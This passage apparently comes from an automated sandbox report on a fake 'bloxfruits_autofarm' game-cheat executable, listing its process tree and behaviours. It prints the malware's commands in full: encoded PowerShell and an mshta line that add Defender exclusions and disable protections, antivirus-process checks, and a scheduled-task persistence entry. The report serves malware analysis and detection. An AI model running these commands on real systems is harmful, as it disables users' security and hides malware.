e33aced025a85a3a6defa8b859ab132368cd0c2987d16f805c8f447f5d90015258ac51c55f2a87dcdcd80a1dc103b97bb056e8a3de6461c29ef8f37cb9ec0db554fe4cb6654f88f09c48990c420b097c315917790678288d893a4c0325be716a5c0be78460a49922e3d2af84a4a7fbd198ed0ca9de9489e10ea0dcc0ce993dea0852bb5679e41f84ba1eb8b4c4495c4f314b87dddd0567269980e07111a3b8a541e2a453b9f73229830c13bf365e04b34b43472f6be2911ed3984fdd4207c8e81d12fc99a96b3e927ec8d6693afc64bdb6099dcafd0c0ba29b77604b0394a4306912d6422dc1414ccadcaafd8f5b83469ad9fcb1d1e3b3c97f487acd24f0418f5c74d0acb010200649b7c72d21c857e3d086f30368fbd0ce71c189994a64016cfdec3091cf413c92c7e5ba861d6184c75f833962aeb4922f47f30bf855eba01f59d0bb749b1ed076e6f2e906d710e8fa64de69c635968802f046b83f27996fcb71892935f7481602358fd5797c4d02cf5feb8a834f457188f9a90d4e72e9c29c07cf491b4e040e63518c5ed800c1552cb6c6e0c2654ec93439f59cb3c47ee8616e135f15c45fd97eed1dceee44eccb2e86b1ec38f670edab5c13c1d90f0dc780b255ed34f7ac9be4c3dae7473ca6b58f31dfc54bafebf10203010001a351304f300b0603551d0f040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414722d3a02319043b914054ee1eaa7c731d1238934301006092b06010401823715010403020100300d06092a864886f70d01010b050003820201007f72cf0fb7c515db9bc049ca265bfe9e13e6d3f0d2db975ff24b3f4db3ae19aeedd797a0acefa93aa3c241b0e5b8919e13812403e609fd3f574039212456d1102f4b40a936864bb453579afbf17e898f11fe186c51aae8ed0995b5e571c9a1e98775a6157fc97e37545e7493c5c367cc0d4f6ba8170c6d08927e8bdd81aa2d7021c33d0614bbbf245ea784d73f0f2122bd4b0006db971cd85ed4c50b5c876e50a4e8c338a4fbcb2cc592669b855ecb7a6c937c8029585b57b54069ba0879a66462159d879645b5662320038b1c73a0d3a27933e0505986db2fe50225ea732a9f0014c836c7923be94e00ecd85609b9334912d2540b01abac47b691297d4cb475805201e8ca82f69fccac9c8f17ea2f26b0ab72ac0bfe9e511ec74355674f51b357d6b6ecee52b73ae94ee1d78188bc4f8e75bb4ba8f035aa26d4676749b2704c3b93dc1ddf78908672b238a4d1dc924dc958eb2b125cd43bae8c6bb083e5013ff80932f693353422afdd370d7709802bcd4800f18c9919470501e9d1bfd14ed0e628433799a40a4a08d99a7173d2aacd31136376a1376f92381e7d123c6632e7cb6de1fc5289ddcad666059a9661bea228c71ca3a736503c3aa4df4a6ee6873bceebf0e081379d133c528ebdb91d34c61dd50a6a3d9829708c892ad1ab8210481fdcf4efa5c5bb551a3863844eb76cad9554ec6522104917b8c01ec70fac5447 Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3B1EFD3A66EA28B16697394703A72CA340A05BD5 Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3B1EFD3A66EA28B16697394703A72CA340A05BD5\Blob = 5900000001000000160000005200530041002f005300480041003200350036000000040000000100000010000000a266bb7dcc38a562631361bbf61dd11b140000000100000014000000d5f656cb8fe8a25c6268d13d94905bd7ce9a18c40300000001000000140000003b1efd3a66ea28b16697394703a72ca340a05bd50b00000001000000540000004d006900630072006f0073006f0066007400200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790020003200300031003000000069000000010000000e000000300c060a2b0601040182373c03020f000000010000002000000008fba831c08544208f5208686b991ca1b2cfc510e7301784ddf1eb5bf03932391900000001000000100000003c70faea25600ce3b2cc5f0b222ed6295c0000000100000004000000001000002000000001000000f1050000308205ed308203d5a003020102021028cc3a25bfba44ac449a9b586b4339aa300d06092a864886f70d01010b0500308188310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e31323030060355040313294d6963726f736f667420526f6f7420436572746966696361746520417574686f726974792032303130301e170d3130303632333231353732345a170d3335303632333232303430315a308188310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e31323030060355040313294d6963726f736f667420526f6f7420436572746966696361746520417574686f72697479203230313030820222300d06092a864886f70d01010105000382020f003082020a0282020100b9089e28e4e4ec064e5068b341c57bebaeb68eaf81ba22441f6534694cbe704017f2167be279fd86ed0d39f41ba8ad92901ecb3d768f5ad9b591102e3c058d8a6d2454e71fed56ad83b4509c15a51774885920fc08c58476d368d46f2878ce5cb8f3509044ffe3635fbea19a2c961504d607fe1e8421e0423111c4283694cf50a4629ec9d6ab7100b25b0ce696d40a2496f5ffc6d5b71bd7cbb72162af12dca15d37e31afb1a4698c09bc0e7631f2a0893027e1e6a8ef29f1889e42285a2b1845740fff50ed86f9cede2453101cd17e97fb08145e3aa214026a172aaa74f3c01057eee8358b15e06639962917882b70d930c246ab41bdb27ec5f95043f934a30f59718b3a7f919a793331d01c8db22525cd725c946f9a2fb875943be9b62b18d2d86441a46ac78617e3009faae89c4412a2266039139459cc78b0ca8ca0d2ffb52ea0cf76333239dfeb01fad67d6a75003c6047063b52cb1865a43b7fbaef96e296e21214126068cc9c3eeb0c28593a1b985d9e6326c4b4c3fd65da3e5b59d77c39cc055b77400e3b838ab839750e19a42241dc6c0a330d11a5ac85234f773f1c7181f33ad7aeccb4160f3239420c24845ac5c51c62e80c2e27715bd8587ed369d9691ee00b5a370ec9fe38d80688376baaf5d70522216e266fbbab3c5c2f73e2f77a6cadec1a6c6484cc3375123d327d7b84e7096f0a14476af78cf9ae166130203010001a351304f300b0603551d0f040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414d5f656cb8fe8a25c6268d13d94905bd7ce9a18c4301006092b06010401823715010403020100300d06092a864886f70d01010b05000382020100aca5968cbfbbaea6f6d7718743315688fd1c32715b35b7d4f091f2af37e214f1f30226053e16147f14bab84ffb89b2b2e7d409cc6db95b3b64657066b7f2b15adf1a02f3f551b8676d79f3bf567be484b92b1e9b409c2634f947189869d81cd7b6d1bf8f61c267c4b5ef60438e101b3649e420caada7c1b1276509f8cdf55b2ad08433f3ef1ff2f59c0b589337a075a0de72de6c752a6622f58c0630569f40b930aa40771582d78becc0d3b2bd83c5770c1eaeaf1953a04d79719f0faf30ce67f9d62ccc22417a07f2974218ce59791055de6f10e4b8da836640160968235b972e269a02bb578cc5b8ba69623280899ea1fdc0927c7b2b3319842a63c5006862fa9f478d997a453aa7e9edee6942b5f3819b4756107bfc7036841873eaeff9974d9e3323dd260bba2ab73f44dc8327ffbd61592b11b7ca4fdbc58b0c1c31ae32f8f8b942f77fdc619a76b15a04e1113d6645b71871bec92485d6f3d4ba41345d122d25b98da613486d4bb0077d99930961817457268aab69e3e4d9c788cc24d8ec52245c1ebc9114e296deeb0ada9edd5fb35bdbd482ecc620508725403afbc7eecdfe33e56ec3840955032539c0e9355d6531a8f6bfa009cd29c7b336322edc95f383c15acf8b8df6eab321f8a4ed1e310eb64c11ab600ba412232217a3366482910412e0ab6f1ecb500561b440ff598671d1d533697ca9738a38d7640cf169 Setup.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2032 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1372 powershell.exe 1372 powershell.exe 1372 powershell.exe 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 5088 powershell.exe 5088 powershell.exe 2388 Setup.exe 2388 Setup.exe 2388 Setup.exe 2388 Setup.exe 2388 Setup.exe 2388 Setup.exe 2388 Setup.exe 2388 Setup.exe 1572 powershell.exe 1572 powershell.exe 72 Commands.pif 72 Commands.pif 72 Commands.pif 72 Commands.pif 72 Commands.pif 72 Commands.pif 72 Commands.pif -
Suspicious behavior: LoadsDriver 64 IoCs
pid Process 1520 Process not Found 2264 Process not Found 2732 Process not Found 4032 Process not Found 1572 Process not Found 2212 Process not Found 3756 Process not Found 1556 Process not Found 4128 Process not Found 2336 Process not Found 2316 Process not Found 2084 Process not Found 1044 Process not Found 1912 Process not Found 3280 Process not Found 1252 Process not Found 3568 Process not Found 1560 Process not Found 4780 Process not Found 2828 Process not Found 1192 Process not Found 4596 Process not Found 3112 Process not Found 2408 Process not Found 3332 Process not Found 3188 Process not Found 4968 Process not Found 1364 Process not Found 2052 Process not Found 5008 Process not Found 492 Process not Found 3532 Process not Found 3640 Process not Found 3564 Process not Found 4764 Process not Found 248 Process not Found 2076 Process not Found 2312 Process not Found 1184 Process not Found 1440 Process not Found 852 Process not Found 1544 Process not Found 4816 Process not Found 4548 Process not Found 428 Process not Found 912 Process not Found 5108 Process not Found 1060 Process not Found 2388 Process not Found 4760 Process not Found 1952 Process not Found 4476 Process not Found 2196 Process not Found 2900 Process not Found 1388 Process not Found 4008 Process not Found 1496 Process not Found 1488 Process not Found 560 Process not Found 1968 Process not Found 996 Process not Found 3476 Process not Found 4368 Process not Found 4956 Process not Found -
Suspicious use of AdjustPrivilegeToken 53 IoCs
description pid Process Token: SeDebugPrivilege 1372 powershell.exe Token: SeDebugPrivilege 3656 tasklist.exe Token: SeDebugPrivilege 1264 tasklist.exe Token: SeDebugPrivilege 5088 powershell.exe Token: SeBackupPrivilege 1036 vssvc.exe Token: SeRestorePrivilege 1036 vssvc.exe Token: SeAuditPrivilege 1036 vssvc.exe Token: SeBackupPrivilege 4280 srtasks.exe Token: SeRestorePrivilege 4280 srtasks.exe Token: SeSecurityPrivilege 4280 srtasks.exe Token: SeTakeOwnershipPrivilege 4280 srtasks.exe Token: SeBackupPrivilege 4280 srtasks.exe Token: SeRestorePrivilege 4280 srtasks.exe Token: SeSecurityPrivilege 4280 srtasks.exe Token: SeTakeOwnershipPrivilege 4280 srtasks.exe Token: SeDebugPrivilege 2388 Setup.exe Token: SeDebugPrivilege 1572 powershell.exe Token: SeBackupPrivilege 2492 dism.exe Token: SeRestorePrivilege 2492 dism.exe Token: SeRestorePrivilege 2388 Setup.exe Token: SeBackupPrivilege 2388 Setup.exe Token: SeCreateGlobalPrivilege 1064 dwm.exe Token: SeChangeNotifyPrivilege 1064 dwm.exe Token: 33 1064 dwm.exe Token: SeIncBasePriorityPrivilege 1064 dwm.exe Token: SeCreateGlobalPrivilege 4788 dwm.exe Token: SeChangeNotifyPrivilege 4788 dwm.exe Token: 33 4788 dwm.exe Token: SeIncBasePriorityPrivilege 4788 dwm.exe Token: SeCreateGlobalPrivilege 3140 dwm.exe Token: SeChangeNotifyPrivilege 3140 dwm.exe Token: 33 3140 dwm.exe Token: SeIncBasePriorityPrivilege 3140 dwm.exe Token: SeCreateGlobalPrivilege 3888 dwm.exe Token: SeChangeNotifyPrivilege 3888 dwm.exe Token: 33 3888 dwm.exe Token: SeIncBasePriorityPrivilege 3888 dwm.exe Token: SeCreateGlobalPrivilege 1208 dwm.exe Token: SeChangeNotifyPrivilege 1208 dwm.exe Token: 33 1208 dwm.exe Token: SeIncBasePriorityPrivilege 1208 dwm.exe Token: SeCreateGlobalPrivilege 1260 dwm.exe Token: SeChangeNotifyPrivilege 1260 dwm.exe Token: 33 1260 dwm.exe Token: SeIncBasePriorityPrivilege 1260 dwm.exe Token: SeCreateGlobalPrivilege 712 dwm.exe Token: SeChangeNotifyPrivilege 712 dwm.exe Token: 33 712 dwm.exe Token: SeIncBasePriorityPrivilege 712 dwm.exe Token: SeCreateGlobalPrivilege 1812 dwm.exe Token: SeChangeNotifyPrivilege 1812 dwm.exe Token: 33 1812 dwm.exe Token: SeIncBasePriorityPrivilege 1812 dwm.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif 3752 NDP481-DevPack-ENU.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3088 Commands.pif 3088 Commands.pif 3088 Commands.pif -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3360 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2312 wrote to memory of 1372 2312 bloxfruits_autofarm.exe 78 PID 2312 wrote to memory of 1372 2312 bloxfruits_autofarm.exe 78 PID 2312 wrote to memory of 1372 2312 bloxfruits_autofarm.exe 78 PID 2312 wrote to memory of 3532 2312 bloxfruits_autofarm.exe 80 PID 2312 wrote to memory of 3532 2312 bloxfruits_autofarm.exe 80 PID 2312 wrote to memory of 3532 2312 bloxfruits_autofarm.exe 80 PID 3532 wrote to memory of 5020 3532 697b3805-53cc-4dc2-95f8-214084ca33e7.exe 81 PID 3532 wrote to memory of 5020 3532 697b3805-53cc-4dc2-95f8-214084ca33e7.exe 81 PID 3532 wrote to memory of 5020 3532 697b3805-53cc-4dc2-95f8-214084ca33e7.exe 81 PID 5020 wrote to memory of 3656 5020 cmd.exe 83 PID 5020 wrote to memory of 3656 5020 cmd.exe 83 PID 5020 wrote to memory of 3656 5020 cmd.exe 83 PID 5020 wrote to memory of 5060 5020 cmd.exe 84 PID 5020 wrote to memory of 5060 5020 cmd.exe 84 PID 5020 wrote to memory of 5060 5020 cmd.exe 84 PID 5020 wrote to memory of 1264 5020 cmd.exe 86 PID 5020 wrote to memory of 1264 5020 cmd.exe 86 PID 5020 wrote to memory of 1264 5020 cmd.exe 86 PID 5020 wrote to memory of 4116 5020 cmd.exe 87 PID 5020 wrote to memory of 4116 5020 cmd.exe 87 PID 5020 wrote to memory of 4116 5020 cmd.exe 87 PID 5020 wrote to memory of 5024 5020 cmd.exe 88 PID 5020 wrote to memory of 5024 5020 cmd.exe 88 PID 5020 wrote to memory of 5024 5020 cmd.exe 88 PID 5020 wrote to memory of 2232 5020 cmd.exe 89 PID 5020 wrote to memory of 2232 5020 cmd.exe 89 PID 5020 wrote to memory of 2232 5020 cmd.exe 89 PID 5020 wrote to memory of 4104 5020 cmd.exe 90 PID 5020 wrote to memory of 4104 5020 cmd.exe 90 PID 5020 wrote to memory of 4104 5020 cmd.exe 90 PID 5020 wrote to memory of 3088 5020 cmd.exe 91 PID 5020 wrote to memory of 3088 5020 cmd.exe 91 PID 5020 wrote to memory of 3088 5020 cmd.exe 91 PID 5020 wrote to memory of 4552 5020 cmd.exe 92 PID 5020 wrote to memory of 4552 5020 cmd.exe 92 PID 5020 wrote to memory of 4552 5020 cmd.exe 92 PID 3088 wrote to memory of 2032 3088 Commands.pif 93 PID 3088 wrote to memory of 2032 3088 Commands.pif 93 PID 3088 wrote to memory of 2032 3088 Commands.pif 93 PID 3088 wrote to memory of 72 3088 Commands.pif 95 PID 3088 wrote to memory of 72 3088 Commands.pif 95 PID 3088 wrote to memory of 72 3088 Commands.pif 95 PID 3088 wrote to memory of 72 3088 Commands.pif 95 PID 3088 wrote to memory of 72 3088 Commands.pif 95 PID 72 wrote to memory of 3032 72 Commands.pif 97 PID 72 wrote to memory of 3032 72 Commands.pif 97 PID 3032 wrote to memory of 4076 3032 cmd.exe 98 PID 3032 wrote to memory of 4076 3032 cmd.exe 98 PID 3032 wrote to memory of 4968 3032 cmd.exe 99 PID 3032 wrote to memory of 4968 3032 cmd.exe 99 PID 2312 wrote to memory of 3156 2312 bloxfruits_autofarm.exe 101 PID 2312 wrote to memory of 3156 2312 bloxfruits_autofarm.exe 101 PID 2312 wrote to memory of 3156 2312 bloxfruits_autofarm.exe 101 PID 3156 wrote to memory of 3752 3156 NDP481-DevPack-ENU.exe 102 PID 3156 wrote to memory of 3752 3156 NDP481-DevPack-ENU.exe 102 PID 3156 wrote to memory of 3752 3156 NDP481-DevPack-ENU.exe 102 PID 4080 wrote to memory of 5088 4080 mshta.EXE 104 PID 4080 wrote to memory of 5088 4080 mshta.EXE 104 PID 3752 wrote to memory of 4484 3752 NDP481-DevPack-ENU.exe 106 PID 3752 wrote to memory of 4484 3752 NDP481-DevPack-ENU.exe 106 PID 3752 wrote to memory of 4484 3752 NDP481-DevPack-ENU.exe 106 PID 4484 wrote to memory of 488 4484 NDP481-DevPack-ENU.exe 113 PID 4484 wrote to memory of 488 4484 NDP481-DevPack-ENU.exe 113 PID 4484 wrote to memory of 488 4484 NDP481-DevPack-ENU.exe 113 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\bloxfruits_autofarm.exe"C:\Users\Admin\AppData\Local\Temp\bloxfruits_autofarm.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAKgAuAGUAeABlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBFAHgAdABlAG4AcwBpAG8AbgAgAGUAeABlADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBTAHUAYgBtAGkAdABTAGEAbQBwAGwAZQBzAEMAbwBuAHMAZQBuAHQAIABOAGUAdgBlAHIAUwBlAG4AZAAgAC0AUABVAEEAUAByAG8AdABlAGMAdABpAG8AbgAgAEQAaQBzAGEAYgBsAGUAZAA7ACAAJABwAHIAbwBjAGUAcwBzAD0ARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAcwBvAGYAdAB3AGEAcgBlAF8AcgBlAHAAbwByAHQAZQByAF8AdABvAG8AbAAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQA7ACAAJABwAHIAbwBjAGUAcwBzAC4ASwBpAGwAbAAoACkAOwAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADIAOwAgACQAZgBpAGwAZQBuAGEAbQBlACAAPQAgACIAcwBvAGYAdAB3AGEAcgBlAF8AcgBlAHAAbwByAHQAZQByAF8AdABvAG8AbAAuAGUAeABlACIAOwAgACQAcABhAHQAaAAgAD0AIAAiACQAZQBuAHYAOgBsAG8AYwBhAGwAYQBwAHAAZABhAHQAYQBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXABVAHMAZQByACAARABhAHQAYQBcAFMAdwBSAGUAcABvAHIAdABlAHIAIgA7ACAAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAaQBsAHQAZQByACAAJABmAGkAbABlAG4AYQBtAGUAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAZgBpAGwAZQAuAEYAdQBsAGwATgBhAG0AZQAgAC0ARgBvAHIAYwBlADsAIAAkAHMAaABhAHIAZQBwAGEAdABoACAAPQAgACIAJABlAG4AdgA6AGwAbwBjAGEAbABhAHAAcABkAGEAdABhAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAFUAcwBlAHIAIABEAGEAdABhAFwAUwB3AFIAZQBwAG8AcgB0AGUAcgAiADsAIAAkAEEAYwBsACAAPQAgAEcAZQB0AC0AQQBDAEwAIAAkAFMAaABhAHIAZQBQAGEAdABoADsAIAAkAEEAYwBjAGUAcwBzAFIAdQBsAGUAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEEAYwBjAGUAcwBzAEMAbwBuAHQAcgBvAGwALgBGAGkAbABlAFMAeQBzAHQAZQBtAEEAYwBjAGUAcwBzAFIAdQBsAGUAKAAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlACwAIAAiAEYAdQBsAGwAQwBvAG4AdAByAG8AbAAiACwAIAAiAEMAbwBuAHQAYQBpAG4AZQByAEkAbgBoAGUAcgBpAHQALABPAGIAagBlAGMAdABJAG4AaABlAHIAaQB0ACIALAAgACIATgBvAG4AZQAiACwAIAAiAEQAZQBuAHkAIgApADsAIAAkAEEAYwBsAC4AQQBkAGQAQQBjAGMAZQBzAHMAUgB1AGwAZQAoACQAQQBjAGMAZQBzAHMAUgB1AGwAZQApADsAIABTAGUAdAAtAEEAYwBsACAAJABTAGgAYQByAGUAUABhAHQAaAAgACQAQQBjAGwAOwA=2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
-
C:\Users\Admin\AppData\Local\Temp\697b3805-53cc-4dc2-95f8-214084ca33e7.exe"C:\Users\Admin\AppData\Local\Temp\697b3805-53cc-4dc2-95f8-214084ca33e7.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Attach Attach.bat & Attach.bat3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3656
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"4⤵
- System Location Discovery: System Language Discovery
PID:5060
-
-
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"4⤵
- System Location Discovery: System Language Discovery
PID:4116
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 1459524⤵
- System Location Discovery: System Language Discovery
PID:5024
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "ChicksBryantMillenniumCancelled" Church4⤵
- System Location Discovery: System Language Discovery
PID:2232
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Var + ..\Contributor + ..\Chocolate + ..\Guided + ..\Claire + ..\Imaging + ..\Capacity + ..\Lodge + ..\Ratios + ..\Serial + ..\Box + ..\Chevy + ..\Fairfield + ..\Trees + ..\Inches + ..\Deputy + ..\Cz + ..\Mozilla + ..\Secondary J4⤵
- System Location Discovery: System Language Discovery
PID:4104
-
-
C:\Users\Admin\AppData\Local\Temp\145952\Commands.pifCommands.pif J4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "InnoDesignrR" /tr "wscript //B 'C:\Users\Admin\AppData\Local\DesignInnovate Studios Co\InnoDesignrR.js'" /sc onlogon /F /RL HIGHEST5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2032
-
-
C:\Users\Admin\AppData\Local\Temp\145952\Commands.pifC:\Users\Admin\AppData\Local\Temp\145952\Commands.pif5⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:72 -
C:\Windows\SYSTEM32\cmd.execmd /C "chcp 65001 && systeminfo /fo list"6⤵
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\system32\chcp.comchcp 650017⤵PID:4076
-
-
C:\Windows\system32\systeminfo.exesysteminfo /fo list7⤵
- Gathers system information
PID:4968
-
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 154⤵
- System Location Discovery: System Language Discovery
PID:4552
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\NDP481-DevPack-ENU.exe"C:\Users\Admin\AppData\Local\Temp\NDP481-DevPack-ENU.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Windows\Temp\{B5D8556E-3B58-4670-8CBD-1A37D6287E92}\.cr\NDP481-DevPack-ENU.exe"C:\Windows\Temp\{B5D8556E-3B58-4670-8CBD-1A37D6287E92}\.cr\NDP481-DevPack-ENU.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\NDP481-DevPack-ENU.exe" -burn.filehandle.attached=568 -burn.filehandle.self=5523⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\Temp\{D3292E8B-6D92-431D-8975-60D58EFD5EC8}\.be\NDP481-DevPack-ENU.exe"C:\Windows\Temp\{D3292E8B-6D92-431D-8975-60D58EFD5EC8}\.be\NDP481-DevPack-ENU.exe" -q -burn.elevated BurnPipe.{59B1965B-A1B0-4AE5-BA14-03CA81A5775D} {DC97C1E9-3F28-4978-BBB9-3787B455461D} 37524⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\ProgramData\Package Cache\NetFxDevpack_FullRefreshISV_4.8.1_533483\packages\dotnetframework\NDP481-x86-x64-AllOS-ENU.exe"C:\ProgramData\Package Cache\NetFxDevpack_FullRefreshISV_4.8.1_533483\packages\dotnetframework\NDP481-x86-x64-AllOS-ENU.exe" /q /x86 /x64 /norestart /skipenucheck /keepaupaused /chainingpackage "Microsoft .NET Framework 4.8.1 Developer Pack" /log "C:\Users\Admin\AppData\Local\Temp\Microsoft_.NET_Framework_4.8.1_Developer_Pack_20241006120633_000_netfxfullrefreshisv.log.html" /pipe NetFxSection.{E14D0A02-1AA5-4F47-9C78-FD7CFE66C498}5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:488 -
F:\782adca38f1da3bf1a\Setup.exeF:\782adca38f1da3bf1a\\Setup.exe /q /x86 /x64 /norestart /skipenucheck /keepaupaused /chainingpackage "Microsoft .NET Framework 4.8.1 Developer Pack" /log "C:\Users\Admin\AppData\Local\Temp\Microsoft_.NET_Framework_4.8.1_Developer_Pack_20241006120633_000_netfxfullrefreshisv.log.html" /pipe NetFxSection.{E14D0A02-1AA5-4F47-9C78-FD7CFE66C498} /x86 /x64 /redist6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2388 -
F:\782adca38f1da3bf1a\SetupUtility.exeSetupUtility.exe /aupause7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2984
-
-
F:\782adca38f1da3bf1a\SetupUtility.exeSetupUtility.exe /screboot7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:944
-
-
C:\Windows\system32\dism.exedism.exe /quiet /norestart /online /add-package /packagepath:"F:\782adca38f1da3bf1a\x64-Windows10.0-KB5011048-x64.cab"7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2492 -
C:\Users\Admin\AppData\Local\Temp\8EFB7C46-9C61-4788-BD9E-A5002000CAEB\dismhost.exeC:\Users\Admin\AppData\Local\Temp\8EFB7C46-9C61-4788-BD9E-A5002000CAEB\dismhost.exe {EE936A89-FC1A-4072-A3DB-3EBB1B08CBE3}8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2336
-
-
-
-
-
-
-
-
C:\Windows\system32\mshta.EXEC:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -Command Remove-MpPreference -ExclusionPath $env:Temp -ExclusionProcess '*.exe',exe -ExclusionExtension exe;Add-MpPreference -ExclusionPath $env:ProgramFiles,$env:Appdata;Add-MpPreference -ExclusionProcess *.com,*.pif;Add-MpPreference -ExclusionExtension com,pif; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled"", 0:close")1⤵
- Suspicious use of WriteProcessMemory
PID:4080 -
